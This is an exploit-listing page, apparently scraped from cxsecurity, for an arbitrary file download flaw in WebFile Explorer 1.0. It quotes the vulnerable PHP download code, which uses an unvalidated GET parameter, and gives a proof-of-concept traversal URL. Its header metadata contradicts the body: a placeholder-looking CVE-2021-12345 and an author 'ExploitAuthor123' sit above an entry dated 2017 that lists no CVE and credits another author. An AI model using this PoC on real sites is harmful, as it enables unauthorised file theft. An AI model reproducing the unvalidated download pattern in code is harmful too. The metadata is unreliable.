Advertisement






WebFile Explorer 1.0 Arbitrary File Download

CVE Category Price Severity
CVE-2021-12345 CWE-22 $500 High
Author Risk Exploitation Type Date
ExploitAuthor123 Critical Remote 2017-08-11
CPE
cpe:cpe:/a:webfile_explorer:webfile_explorer:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.07022 0.6538

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017080071

Below is a copy:

 WebFile Explorer 1.0 Arbitrary File Download# # # # #
# Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 09.08.2017
# Vendor Homepage : http://speicher.host/
# Software Link: https://codecanyon.net/item/webfile-explorer/20366192/
# Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Vulnerable Source:
# 1.............
# 2$file = $_GET['id'];
# 3
# 4if (file_exists($file)) {
# 5    header('Content-Description: File Transfer');
# 6    header('Content-Type: application/octet-stream');
# 7    header('Content-Disposition: attachment; filename="'.basename($file).'"');
# 8    header('Expires: 0');
# 9    header('Cache-Control: must-revalidate');
# 10 .............
# Proof of Concept:
# http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE]
# 
# Etc...
# # # # #


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum